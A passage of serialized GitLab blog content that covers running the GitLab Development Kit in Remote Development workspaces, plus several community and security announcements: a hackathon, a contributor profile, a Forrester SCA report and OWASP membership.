behind the scenes when a workspace is created.\n\n## Behind the scenes with Remote Development workspaces\nWhen you create a new workspace, the following happens:\n1. The GitLab agent for Kubernetes creates a new namespace in your cluster. The agent dynamically generates a name for and assumes management of the namespace.\n1. Inside the namespace, a new deployment is created, specifying the container you chose in your `.devfile.yaml` as the image to use.\n1. This deployment is configured with some [init containers](https://kubernetes.io/docs/concepts/workloads/pods/init-containers/) that perform some actions:\n    1. Cloning the repository into `/project/${project_path}`.\n    1. Injecting the VS Code server binary into your container.\n1. Once those init containers are complete, your container starts and the workspace becomes available.\n\n## The clone problem\nWhen cloning a repository, `git` tends to do much of the work in memory. This can be a challenge on larger projects/repositories, as it can require significant amounts of RAM. When cloning the GitLab project, for instance, git consumes approximately 1.6GB of RAM. This number is only going to increase with time. Sure, strategies like [shallow clones](https://git-scm.com/docs/git-clone#Documentation/git-clone.txt---depthltdepthgt) can help reduce this, but these are perhaps less suited to active use by a developer as they can increase the amount of time required to perform ongoing git operations.\n\nIn fact, creating a workspace using our `.devfile.yaml` in a fork of the GitLab project failed for this reason. The init container performing the clone is currently hard-limited to 128MiB of RAM, after which the memory management processes on the node kill the container.\n\nTo overcome this limitation, move the `.devfile.yaml` into the a fork of the root of the GDK repository. This project clones more quickly (and does so using fewer resources), so it's a  perfect starting point for running GDK itself. Another (bonus) advantage: You're then primed to contribute to the GDK itself, in addition to any of the other GitLab projects that the GDK clones.\n\n## Components of a GDK installation\nGDK clones the following projects from the GitLab 'family':\n* [GitLab](https://gitlab.com/gitlab-org/gitlab)\n* [Gitaly](https://gitlab.com/gitlab-org/gitaly)\n* [GitLab shell](https://gitlab.com/gitlab-org/gitlab-shell)\n\nThis allows you to work on any items in those directories as a part of your \"live\" installation.\n\n## Getting GDK installed and running in a workspace\nOnce I had a workspace up and running, my next step was to get GDK installed and running *in* that workspace. The GDK's documentation presents [several routes for doing this](https://gitlab.com/gitlab-org/gitlab-development-kit/#installation).\n\nA complete installation can take some time, as GDK needs to bootstrap itself and install a number of prerequisites. This is less than ideal in the context of a Remote Development workspace, as one of remote development's primary benefits is enabling access to a development environment rapidly. Requiring a user to bootstrap an environment that takes 50 minutes (or longer) doesn't help achieve this goal.\n\nTo combat this, I built a container image that effectively bootstraps and installs GDK, pre-building the GDK prerequisites and pre-seeding the database. This image and its associated tooling are currently [in review](https://gitlab.com/gitlab-org/gitlab-development-kit/-/merge_requests/3231).\n\n## Pre-building\nPre-building the container and running the bootstrap process on a scheduled basis allows us to perform that process once, without requiring the user to wait for something that can essentially be \"pre-canned\" for their use.\n\nOnce the workspace is running, we still need to \"reinstall\" the GDK environment with the latest version of our GitLab repository, but this step doesn't take quite as long as a complete bootstrap.\n\n## Generating a gdk.yml file\nTo work properly, GDK also requires a [`gdk.yml` file](https://gitlab.com/gitlab-org/gitlab-development-kit/-/blob/main/doc/configuration.md#gdkyml). This file tells GDK how to configure GitLab to return the correct URLs and other items. To get GDK running in Remote Development, Rails needs to return URLs in a certain scheme (otherwise your browser won't know where to connect). To help this along, we [inject an environment variable](https://gitlab.com/gitlab-org/gitlab/-/issues/415328) into the workspace container. This variable helps us determine the URL in use (which is dynamically generated for each workspace).\n\nWe [now have a script](https://gitlab.com/gitlab-org/gitlab-development-kit/-/blob/main/support/gitlab-remote-dev/remote-dev-gdk-bootstrap.sh?ref_type=heads) in GDK that will generate your `gdk.yml` file based on your workspace.\n\n## Creating our devfile\nThe contents of my `.devfile.yaml` looks like this:\n\n```yaml\nschemaVersion: 2.2.0\ncomponents:\n  - name: tooling-container\n    attributes:\n      gl/inject-editor: true\n    container:\n      # NB! This image is only in use until https://gitlab.com/gitlab-org/gitlab-development-kit/-/merge_requests/3231 is merged!\n      image: registry.gitlab.com/gitlab-org/gitlab-development-kit/gitlab-remote-workspace:stingrayza-gdk-remote-dev-add-container\n      memoryRequest: 10240M\n      memoryLimit: 16384M\n      cpuRequest: 2000m\n      cpuLimit: 6000m\n      endpoints:\n        - name: ssh-2222\n          targetPort: 2222\n        - name: gdk-3000\n          targetPort: 3000\n        - name: docs-3005\n          targetPort: 3005\n        - name: pages-3010\n          targetPort: 3010\n        - name: webpack-3808\n          targetPort: 3808\n        - name: devops-5000\n          targetPort: 5000\n        - name: jaeger-5778\n          targetPort: 5778\n        - name: objects-9000\n          targetPort: 9000\n        - name: shell-9122\n          targetPort: 9122\n```\n\nThis definition comes straight out of the [Workspace docs](https://docs.gitlab.com/ee/user/workspace/#devfile), and opens a number of ports that GDK uses. (For now, I've only tested the port `gdk-3000`, which is the the link to our instance of GDK.)\n\n## From Workspace to GDK\nOnce we have a project with a `.devfile.yaml`, our final step is to [create a new workspace](https://docs.gitlab.com/ee/user/workspace/#create-a-workspace).\n\nAs a part of this step, your cluster will pull the image as defined in the `.devfile.yaml` and start it up. For the GDK image we pre-built, this can take a few minutes.\n\nOnce the workspace is ready, the last step is to follow the link from the UI to connect to the workspace. This will open up a familiar VS Code IDE, with our GDK fork checked out.\n\nBut wait, where's GDK?\n\nWell, the pre-build did most of the work for us, but we still need to take a few final steps before we can claim that GDK is up and running. These have been built into a script we can run from the integrated terminal within the workspace.\n\nTo open a terminal, we can click on the VS Code Hamburger menu (top left), navigate to `Terminal` and select `New Terminal`.\n\nNow we execute the following script, which completes the setup and copies a couple of files over from the pre-built folders:\n\n```shell\nsupport/gitlab-remote-dev/remote-dev-gdk-bootstrap.sh\n```\n\nThis can take up to 15 minutes, but when it's done it should output the magic words — something like the following (note the 3000 in the URL; we specified that in the `.devfile.yaml` earlier):\n\n```shell\nSuccess! You can access your GDK here: https://3000-workspace-62637-2083197-apglwp.workspace.my-workspace.example.net/\n```\n\n## Connect to your GDK\nFollow the link as displayed using Cmd-click or Ctrl-click. After a couple of moments (GDK boot time), you should reach a familiar GitLab login screen.\n\nCongratulations! GDK is now running inside your Remote Development workspace.\n\nTo log in, type `gdk` in your terminal and you'll see the default admin credentials displayed near the bottom:\n\n```shell\n# Development admin account: xxxx / xxxx\n\nFor more information about GitLab development see\nhttps://docs.gitlab.com/ee/development/index.html.\n```\n\nLog into your GDK with the default credentials, change the admin user password, and you're all set!\n\n## Demo of workspace launch\nHere's a demo of launching a workspace in my personal cluster:\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/iXq1NnTjnX0\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n## How to contribute to GitLab\nIn this article I explained how to get GDK up and running in Remote Development workspaces. This is not without its challenges, but the end result should mean that contributing to GitLab (especially in resource-constrained environments) is quicker and easier.\n\nDo you want to contribute to GitLab? Come and join in the conversation in the `#contribute` channel on GitLab's [Discord](https://discord.gg/gitlab), or just pop in and say \"hello.\"\n\n_Disclaimer: This blog contains information related to upcoming products, features, and functionality. It is important to note that the information in this blog post is for informational purposes only. Please do not rely on this information for purchasing or planning purposes. As with all projects, the items mentioned in this blog and linked pages are subject to change or delay. The development, release, and timing of any products, features, or functionality remain at the sole discretion of GitLab._",[752,685,686,845,708,9],{"slug":2352,"featured":6,"template":689},"gitlab-gdk-remote-development","content:en-us:blog:gitlab-gdk-remote-development.yml","Gitlab Gdk Remote Development","en-us/blog/gitlab-gdk-remote-development.yml","en-us/blog/gitlab-gdk-remote-development",{"_path":2358,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2359,"content":2364,"config":2369,"_id":2371,"_type":14,"title":2372,"_source":16,"_file":2373,"_stem":2374,"_extension":19},"/en-us/blog/gitlab-hackathon",{"title":2360,"description":2361,"ogTitle":2360,"ogDescription":2361,"noIndex":6,"ogImage":1348,"ogUrl":2362,"ogSiteName":673,"ogType":674,"canonicalUrls":2362,"schema":2363},"Announcing the GitLab Hackathon","The first Hackathon event for the GitLab community will take place September 27-28.","https://about.gitlab.com/blog/gitlab-hackathon","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Announcing the GitLab Hackathon\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2018-09-17\",\n      }",{"title":2360,"description":2361,"authors":2365,"heroImage":1348,"date":2366,"body":2367,"category":10,"tags":2368},[704],"2018-09-17","\n\nWhat makes GitLab a great community is that contributions to the GitLab product come from everyone, regardless of whether they are employed by GitLab or not. Concrete evidence of broad community contribution can be seen in the more than 2,500 merged  [“community contribution”](https://gitlab.com/groups/gitlab-org/-/merge_requests?label_name%5B%5D=Community+contribution&scope=all&sort=weight&state=merged) MRs. This community contribution not only helps to enhance the GitLab product, but also brings fresh ideas and perspectives.\n\n![Screenshot showing more than 2,500 merged community MRs](https://about.gitlab.com/images/blogimages/2018-09-13-gitlab-hackathon-inline.png){: .shadow.medium.center}\n*\u003Csmall>MRs from community members not employed by GitLab\u003C/small>*\n\n## What's the deal?\n\n In order to build momentum and to provide a forum for community members to get together, I'm excited to announce that we're holding a [GitLab Hackathon on September 27 and 28](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/wikis/Q3%272018-hackathon). This virtual event will kick off at 07:00 UTC on the 27th and the focus will be to work on issues that are [\"Accepting merge requests\"](https://gitlab.com/gitlab-org/gitlab/-/issues?label_name%5B%5D=Accepting+merge+requests&sort=weight_asc). As an incentive, anyone who has their MRs merged within a week of Hackathon period will receive a voucher for GitLab swag. We will also have a bigger prize for the person with the most MRs merged.\n\n## What else is going on?\n\nIn addition to hacking, we plan to invite community experts for quick presentations plus Q&A sessions on various topics over the two days. These sessions will also be recorded and available on [GitLab YouTube channel](https://www.youtube.com/gitlab). The Hackathon will be followed by the [Issue Bash](/community/issue-bash/) from September 29-30.\n\n## Where can I find help?\n\nFor communications during the Hackathon, we will use the new [GitLab Community room in Gitter](https://gitter.im/gitlabhq/community). We already have a [gitlabhq room](https://gitter.im/gitlabhq/gitlabhq) that’s been active with support discussions. However, we wanted to create a separate community room where contributors to GitLab can come together to have community-related discussions and to help each other as people have questions while contributing to GitLab. This is open to everyone, so please [join the room](https://gitter.im/gitlabhq/community) if you are not part of it already.\n\n## How do I get started with contributing?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can\ncontribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\nCover image: [\"Gitlab application screengrab\"](https://unsplash.com/photos/ZV_64LdGoao) by [Pankaj Patel](https://unsplash.com/@pankajpatel).\n{: .note}\n",[267,779,9,277],{"slug":2370,"featured":6,"template":689},"gitlab-hackathon","content:en-us:blog:gitlab-hackathon.yml","Gitlab Hackathon","en-us/blog/gitlab-hackathon.yml","en-us/blog/gitlab-hackathon",{"_path":2376,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2377,"content":2383,"config":2390,"_id":2392,"_type":14,"title":2393,"_source":16,"_file":2394,"_stem":2395,"_extension":19},"/en-us/blog/gitlab-heroes-unmasked-lessons-from-early-mistakes",{"title":2378,"description":2379,"ogTitle":2378,"ogDescription":2379,"noIndex":6,"ogImage":2380,"ogUrl":2381,"ogSiteName":673,"ogType":674,"canonicalUrls":2381,"schema":2382},"Overcoming coding challenges to become a valued GitLab hero","Niklas van Schrick shares his journey from learning a new language to becoming an active contributor to GitLab.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749668009/Blog/Hero%20Images/wrong-way-2.jpg","https://about.gitlab.com/blog/gitlab-heroes-unmasked-lessons-from-early-mistakes","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab Heroes Unmasked: How a difficult start in coding led to being a valued contributor\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Jamie Rachel\"}],\n        \"datePublished\": \"2022-04-26\",\n      }",{"title":2384,"description":2379,"authors":2385,"heroImage":2380,"date":2387,"body":2388,"category":1119,"tags":2389},"GitLab Heroes Unmasked: How a difficult start in coding led to being a valued contributor",[2386],"Jamie Rachel","2022-04-26","\n\nA key to GitLab’s success is our vast community of advocates. Here at GitLab, we call these active contributors [\"GitLab Heroes\"](/community/heroes/). Each hero contributes to GitLab in numerous ways, including elevating releases, sharing best practices, speaking at events, and more.  [Niklas van Schrick](https://gitlab.com/Taucher2003), who currently works as a Developer trainee, has been an active GitLab Hero since November 2021. \n\nNiklas upholds the [GitLab values](https://handbook.gitlab.com/handbook/values/), especially for transparency, by sharing his trials and discoveries with self-hosted instances. We all can learn from each other’s mistakes, which leads to collaborating to improve processes and build a better developer experience.\n\nHis journey to becoming a GitLab hero is detailed below.\n\n## A difficult beginning\n\n**Niklas van Schrick:** Every developer has to start somewhere. My journey started in May 2019 with Java and Minecraft. While development in Minecraft is great for fast results, based on my experience it’s not the best idea for a beginner.\n\nIt introduces the problem of learning a framework instead of the actual language and it delayed my learning process. I was able to write some functionality as plugins for a server, but I didn't know a single principle of the underlying language, Java. That led to code that was not easily maintainable. For each new functionality, I was building quickly without properly thinking about the structure of my code.\n\nWhen I was starting out, I learned from another developer. Although it is great to have someone guide you through the process, it can also lead to issues. My mistake was believing everything my mentor told me and not looking for solutions myself. In this way, I learned anti-patterns of code design, which led to a full refactoring of the project at a later time. It also slowed down my learning process further as I was asking for help before searching for solutions myself.\n\n## The importance of joining a developer community\n\n**Van Schrick:** In early 2020, we moved our projects to a self-hosted GitLab instance. It was my first experience with [version control](/topics/version-control/). It was a big advantage because we were able to see previous changes and easily identify the causes of bugs. I recommend using a version control system even in the early stages of your development journey, as it makes many things easier and keeps a history of your work. In the beginning, it is totally fine to just push to master or not even use a remote repository.\n\nA big improvement for me was joining a [developer community](/community/), as there are many developers who are happy to help. I learned many new concepts that were widely used by the developers of that community, and this led to much more maintainable code. You don't even have to actively ask in the community to learn new things.\n\nMost of the time, it is enough to keep up with the messages and read the conversations from others. In a helpful developer community, you always have someone who says, \"Why are you doing it like this? There are better ways to do this,\" and offers suggestions to improve the code.\n\n## Contribute, contribute, contribute\n\n**Van Schrick:** Another big step is to make contributions to open source projects. It allowed me to be part of the code review process from others, and learn from it. My first contribution to an open source project, which was not led by me, was a [typo fix in a GitLab view](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/54834). I was surprised at how well the code review went and how fast it got merged. The positive experience encouraged me to join an open source project as a maintainer, and it has been a great experience. I ended up being an active contributor to the GitLab project and a GitLab Hero.\n\n_GitLab welcomes every new contributor and has [many possibilities for your first contribution](/community/contribute/)._\n",[708,9,267],{"slug":2391,"featured":6,"template":689},"gitlab-heroes-unmasked-lessons-from-early-mistakes","content:en-us:blog:gitlab-heroes-unmasked-lessons-from-early-mistakes.yml","Gitlab Heroes Unmasked Lessons From Early Mistakes","en-us/blog/gitlab-heroes-unmasked-lessons-from-early-mistakes.yml","en-us/blog/gitlab-heroes-unmasked-lessons-from-early-mistakes",{"_path":2397,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2398,"content":2404,"config":2411,"_id":2413,"_type":14,"title":2414,"_source":16,"_file":2415,"_stem":2416,"_extension":19},"/en-us/blog/gitlab-is-an-sca-contender",{"title":2399,"description":2400,"ogTitle":2399,"ogDescription":2400,"noIndex":6,"ogImage":2401,"ogUrl":2402,"ogSiteName":673,"ogType":674,"canonicalUrls":2402,"schema":2403},"Forrester names GitLab challenger in software composition","GitLab has been recognized by analysts as a challenger in Software Composition Analysis.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749669950/Blog/Hero%20Images/security-cameras.jpg","https://about.gitlab.com/blog/gitlab-is-an-sca-contender","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab is named a Challenger in The Forrester Wave™: Software Composition Analysis, Q2 2019\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Cindy Blake\"}],\n        \"datePublished\": \"2019-04-12\",\n      }",{"title":2405,"description":2400,"authors":2406,"heroImage":2401,"date":2408,"body":2409,"category":299,"tags":2410},"GitLab is named a Challenger in The Forrester Wave™: Software Composition Analysis, Q2 2019",[2407],"Cindy Blake","2019-04-12","\n\nWhile GitLab is best known in the traditional DevOps space, we have also begun to grow out our expertise in application security, which may come as a [surprise to security professionals](https://www.linkedin.com/pulse/ciso-cheat-sheet-git-cindy-blake-cissp), who may not have encountered us previously. We may have started out focused on traditional developer tools, however, as GitLab has added capabilities to cover the entire Software Development\nLifecycle (SDLC), this now includes not only a market-leading [Continuous Integration](/blog/gitlab-leader-continuous-integration-forrester-wave/)\nsolution but also, more recently, integrated [application security testing built into the CI/CD pipeline](/solutions/security-compliance/).\nOur single, end-to-end application enables security testing that is tightly aligned to today’s\nrapid, [iterative cycles of DevOps](/solutions/security-compliance/) development and the modern\ninfrastructure that accompanies cloud native applications.\n\n## Who was included?\n\nFor The Forrester Wave™: Software Composition Analysis, Q2 2019, participating vendors were required to\nhave most of the following capabilities out of the box:\n- Ability to provide remediation advice on both open source license risk and vulnerabilities;\n- Ability to integrate into SDLC automation tools;\n- Ability to provide proactive vulnerability management;\n- Ability to edit and create policies; and\n- Ability to visually report on open source risk.\n\nParticipating vendors were also required to have more than $10M in revenue and have\ninterest from Forrester clients or relevance to them.\n\n## GitLab is a new challenger\n\nHaving only added security capabilities in December 2017, GitLab has been excluded from\nother analyst application security reports that only look at more established players.\nIn our first official security-oriented analyst evaluation, we are excited not only to get the\nword out about GitLab’s security capabilities, but also to have this opportunity for analyst\nfeedback and insight into how GitLab compares. We take to heart not only areas where we\nshine – but also where improvement is needed. With GitLab,\n“[everyone can contribute](/community/contribute/),” and the feedback gained from\nForrester is another valuable contribution. We also welcome [your participation](/community/contribute/) and invite you to help us\nunderstand what you would like to see as our security capabilities grow.\n\nBased on this analyst report and analyst interaction feedback, we are already addressing improvement opportunities in our\n[roadmap](/direction/secure/#upcoming-releases) and [vision](/direction/secure/#direction).\n\n**Check out our [complete SCA response](/analysts/forrester-sca/) for links to specific updates and response comments.**\n\nAs a company dedicated to releasing incrementally, delivering first on breadth and then\non depth, it is not uncommon for GitLab to initially place in more of a challenger position,\nas our feature set generally does not have the same maturity as established players in the space.\nHowever, when GitLab enters a space, we do so boldly, with clear intentions and a solid strategy.\nGitLab’s strategy for application security testing and software composition analysis focuses\nmore equally on both the developer and the security professional than traditional solutions.\nYou will find some areas in strategy where we were not scored as highly as we believe we\nshould be, due to our more aggressive focus on development.\n\n## Updates since the evaluation\n\nGitLab has shipped a [major new release every month](/releases/categories/releases/)\nfor 90 consecutive months. Forrester evaluated GitLab 11.6 for this report while versions\n[11.7](/releases/2019/01/22/gitlab-11-7-released/), [11.8](/releases/2019/02/22/gitlab-11-8-released/), and\n[11.9](/releases/2019/03/22/gitlab-11-9-released/) have since been released. You will find several features\nthat Forrester felt were lacking have already been added, including improvements to the\nsecurity dashboard, additional languages added to SAST scanning, and secrets detection.\nWhen using Forrester’s scoring tool, be sure to adjust the criteria for our current capabilities.\nA list of what’s been added since Forrester’s evaluation can be found on our [complete SCA response](/analysts/forrester-sca/).\n\n## Forrester’s key takeaway: “Remediation, policy management, and reporting are key differentiators”\n\nForrester says, “As developers continue to use open source to accelerate the release of new\napplication functionality, remediation, policy management, and reporting will dictate which\nproviders will lead the pack. Vendors that can provide developers with remediation advice\nand even create patches position themselves to significantly reduce business risk.”\n\nThis takeaway is closely aligned with GitLab's [vision for application security testing](/direction/secure/#direction)\nand our work in progress for [auto remediation](https://gitlab.com/groups/gitlab-org/-/epics/133). While not available in the evaluated version (11.6), today’s GA release, (11.9), [can detect a more current patch available](/releases/2019/03/22/gitlab-11-9-released/#vulnerability-remediation-merge-request) and\nenable the developer to create a [new branch and apply the patch](https://docs.gitlab.com/ee/user/application_security/security_dashboard/#create-a-merge-request-from-a-vulnerability)\nwith one click. Upcoming versions will [automatically run the pipeline and present the results](https://gitlab.com/groups/gitlab-org/-/epics/275) to the developer to accept or reject.\nBy automating remediations that are readily apparent, developers and security can focus on\nvulnerabilities whose remediation is not as straightforward.\n\nThe fact that GitLab is a [single application](/) for the entire SDLC enables us to take\nremediation even further – actually running the pipeline in a separate branch,\neven [measuring the performance impact](https://gitlab.com/gitlab-org/gitlab-ee/issues/9382)\nof the patch. We isolate the cause and effect: the developer makes a code change, that code is\ntested and they see the results before merging the code with others’. It also allows us to do [Dynamic scanning](https://docs.gitlab.com/ee/user/application_security/dast/) in the same manner, before the\ncode is merged with anyone else’s. We do this by spinning up a\n[review app](https://docs.gitlab.com/ee/ci/review_apps/) in the pipeline report.\nThis fully functioning app reflects the developer’s code changes and can be used for user testing,\nperformance testing, and dynamic app security scanning.\n\n## GitLab's advice\n\nWe believe GitLab is ideal for enterprises who are:\n\n* Using GitLab for CI/CD.\n* Practicing iterative development via DevOps.\n* Using containers and serverless.\n\nFor the enterprise that has not invested in app sec tools, GitLab can quickly provide\nscanning, often necessary for regulatory compliance, with a single application.\nGitLab offers SAST, DAST, Dependency, Container Scanning, and License Management [with one app](/stages-devops-lifecycle/application-security-testing/) – no need to evaluate and buy from multiple vendors, then stitch together integration with the DevOps toolchain. In fact, GitLab customer, [Glympse Inc.](https://glympse.com/),\nstood up 40 repos with automated security testing, using all of the GitLab scans, in less time\nthan they could have installed just the individual tools – and as a bonus, they impressed their\nauditors with their process.\n\nFor the enterprise already deeply invested in traditional app sec tools, GitLab affords a\nbroader and [earlier scanning effort](/solutions/security-compliance/), using a tool that\ndevelopers are already using. GitLab can scan every code change, much the way that\nevery airplane passenger gets scanned through security. Save the deeper scans for\nlater and/or less frequent evaluation by the security team. Consider using GitLab on select\nprojects to experience the more efficient workflow and potentially reduce your scanning costs from costlier tools.\n\n## Our response\n\n We invite you to see our [complete response](/analysts/forrester-sca/), and as always, welcome\n [your contributions](/community/contribute/)!\n\n Cover image by [Scott Webb](https://unsplash.com/@scottwebb) on [Unsplash](https://unsplash.com/photos/yekGLpc3vro)\n{: .note}\n",[845,803,9,930,865,953],{"slug":2412,"featured":6,"template":689},"gitlab-is-an-sca-contender","content:en-us:blog:gitlab-is-an-sca-contender.yml","Gitlab Is An Sca Contender","en-us/blog/gitlab-is-an-sca-contender.yml","en-us/blog/gitlab-is-an-sca-contender",{"_path":2418,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2419,"content":2425,"config":2431,"_id":2433,"_type":14,"title":2434,"_source":16,"_file":2435,"_stem":2436,"_extension":19},"/en-us/blog/gitlab-is-now-a-member-of-the-owasp-foundation",{"title":2420,"description":2421,"ogTitle":2420,"ogDescription":2421,"noIndex":6,"ogImage":2422,"ogUrl":2423,"ogSiteName":673,"ogType":674,"canonicalUrls":2423,"schema":2424},"GitLab is now a member of the OWASP Foundation","GitLab is thrilled to announce our membership in the OWASP Foundation.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679658/Blog/Hero%20Images/Owasp_logo.jpg","https://about.gitlab.com/blog/gitlab-is-now-a-member-of-the-owasp-foundation","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab is now a member of the OWASP Foundation\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Wayne Haber\"}],\n        \"datePublished\": \"2020-01-21\",\n      }",{"title":2420,"description":2421,"authors":2426,"heroImage":2422,"date":2428,"body":2429,"category":865,"tags":2430},[2427],"Wayne Haber","2020-01-21","\n\nGitLab is thrilled to announce our membership in the [OWASP Foundation](https://www2.owasp.org/).  OWASP is a non-profit that works to improve the security of software through open-source projects, worldwide local chapters, tens of thousands of members, and educational/training conferences.\n\nWe leverage OWASP to help provide security features integrated into the development lifecycle via the [Secure stage](/stages-devops-lifecycle/secure/) and defending your apps and infrastructure from security intrusions via the [Protect stage](/stages-devops-lifecycle/govern/).  We also leverage OWASP on our  [security team](/handbook/security/) who are responsible for the security posture of the company, products, and client-facing services.\n\n## Our favorite OWASP initiatives\n\nOur favorite OWASP initiatives include:\n* [OWASP Top 10](https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project) - standard awareness document for developers for web application security\n* [WebGoat](https://owasp.org/www-project-webgoat/) - a deliberately insecure application that allows interested developers to test commonly found vulnerabilities\n* [ModSecurity WAF ruleset](https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project) - a set of generic attack detection rules for use with web application firewalls\n* [ZED Attack Proxy](https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project) - a penetration testing tool designed for testing web applications\n* [Benchmark](https://www.owasp.org/index.php/Benchmark) - a test suite designed to evaluate the accuracy, coverage, and speed of automated software vulnerability detection tools\n* [Find Security Bugs](https://www.owasp.org/index.php/OWASP_Find_Security_Bugs) - find security bugs\n* [Dependency Check](https://www.owasp.org/index.php/OWASP_Dependency_Check) - a tool that attempts to detect publicly disclosed vulnerabilities contained within a project’s dependencies\n* [Juice Shop](https://owasp.org/www-project-juice-shop/) - an intentionally insecure web application that can be used in security training and validation\n* [Software Assurity Maturity Model](https://www.owasp.org/index.php/OWASP_SAMM_Project) - an open framework to help organizations formulate and implement a strategy for software security\n\nOur membership allows us to support these OWASP projects while also allowing us to help shape the direction of the OWASP community.\n\n## OWASP AppSec California\n\nPlease meet us at [OWASP's AppSec California conference](https://2020.appseccalifornia.org/), which we are sponsoring.  It is Jan 21 thru Jan 24 in Santa Monica, CA.\n\n## We are hiring!\n\nIf all of this piques your interest, a reminder that GitLab is hiring for our engineering (secure, protect) and security teams!  Please review our [open jobs](/jobs/).\n\n",[277,930,9,865],{"slug":2432,"featured":6,"template":689},"gitlab-is-now-a-member-of-the-owasp-foundation","content:en-us:blog:gitlab-is-now-a-member-of-the-owasp-foundation.yml","Gitlab Is Now A Member Of The Owasp Foundation","en-us/blog/gitlab-is-now-a-member-of-the-owasp-foundation.yml","en-us/blog/gitlab-is-now-a-member-of-the-owasp-foundation",{"_path":2438,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2439,"content":2445,"config":2451,"_id":2453,"_type":14,"title":2454,"_source":16,"_file":2455,"_stem":2456,"_extension":19},"/en-us/blog/gitlab-issue-bash-december-2017",{"title":2440,"description":2441,"ogTitle":2440,"ogDescription":2441,"noIndex":6,"ogImage":2442,"ogUrl":2443,"ogSiteName":673,"ogType":674,"canonicalUrls":2443,"schema":2444},"Join GitLab's December Issue Bash","Join us December 2017 and help us to squash some of the open issues in the GitLab Community Edition tracker!","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749680123/Blog/Hero%20Images/gitlab-issue-bash-june-2017-cover.png","https://about.gitlab.com/blog/gitlab-issue-bash-december-2017","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Join GitLab's December Issue Bash\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Mark Fletcher\"}],\n        \"datePublished\": \"2017-11-20\",\n      }",{"title":2440,"description":2441,"authors":2446,"heroImage":2442,"date":2448,"body":2449,"category":299,"tags":2450},[2447],"Mark Fletcher","2017-11-20","\n\nThis December we'll be holding another of our quarterly issue bashes to allow the community to get involved in helping to squash some issues in the GitLab Community Edition issue tracker. We have over 1,800\n[GitLab contributors](http://contributors.gitlab.com/contributors/),\nand we are always looking for more people to join in and contribute to the project in any way that they can.\n\n\u003C!-- more -->\n\nOf course, some lucky contributors will be rewarded with awesome swag! 🙌\n\nWe now have [the issue bash landing page](/community/issue-bash/) with all the information about how exactly the Issue Bash works. Please take a look there and provide any feedback to our [feedback project](https://gitlab.com/gitlab-org/issue-bash/feedback) or propose changes directly [here](https://gitlab.com/gitlab-com/www-gitlab-com/blob/master/source/community/issue-bash/index.html.haml)!\n\n## When is it going to happen?\n\nWe'll kick it off at 00:01 UTC on Saturday, **December 16th**\nand will keep it up until 23:59 UTC on Sunday, **December 17th**.\n\n## Who can contribute?\n\n{::options parse_block_html=\"true\" /}\n\n\u003Ci class=\"fab fa-gitlab\" style=\"color:rgb(107,79,187); font-size:.85em\" aria-hidden=\"true\">\u003C/i>\n&nbsp;&nbsp;\n**At GitLab, everyone can contribute!**\n&nbsp;&nbsp;\n\u003Ci class=\"fab fa-gitlab\" style=\"color:rgb(107,79,187); font-size:.85em\" aria-hidden=\"true\">\u003C/i>\n{: .alert .alert-webcast}\n\nThis is your chance to get involved! Most of the tasks don't require\ntechnical expertise, therefore, non-technical community\nmembers are definitely welcome and prize worthy!\n\n## How do you get involved?\n\nPlease see [the FAQ on the Issue Bash landing page](/community/issue-bash/#bash-q-a) to learn more about how to get involved.\n\n## Prizes\n\nWe have some awesome swag available to as prizes:\n\n- Five T-shirts\n- Four pairs of pajama pants\n- Three Moleskine notebooks\n- Two [PocketCHIPs](https://getchip.com/pages/pocketchip)\n- One messenger bag (filled with all the stuff listed above!)\n\n![GitLab Issue Bash - Prizes](https://about.gitlab.com/images/blogimages/gitlab-issue-bash-june-2017-prizes.png)\n\nUsers making any contributions to the project,\nbetween the start and end times of the event, will be entered into the random draw\nto win a prize. The contributions will be collated after the end of the event and\nprize winners, drawn at random, will be contacted in the weeks that follow.\n\nTo see how we draw winners at random please take a look at the [prize winner calculator project](https://gitlab.com/gitlab-org/issue-bash/prize-winner-calculator)\n\n## Questions? More info?\n\n[GitLab team](/company/team/) and [GitLab core team](/community/core-team/) members will be on hand to answer questions and close issues. Please mention them if you need any help or need attention on an issue\n\n* [@markglenfletcher](https://gitlab.com/markglenfletcher)\n* [@tnir](https://gitlab.com/tnir)\n* [@blackst0ne](https://gitlab.com/blackst0ne)\n",[277,267,9],{"slug":2452,"featured":6,"template":689},"gitlab-issue-bash-december-2017","content:en-us:blog:gitlab-issue-bash-december-2017.yml","Gitlab Issue Bash December 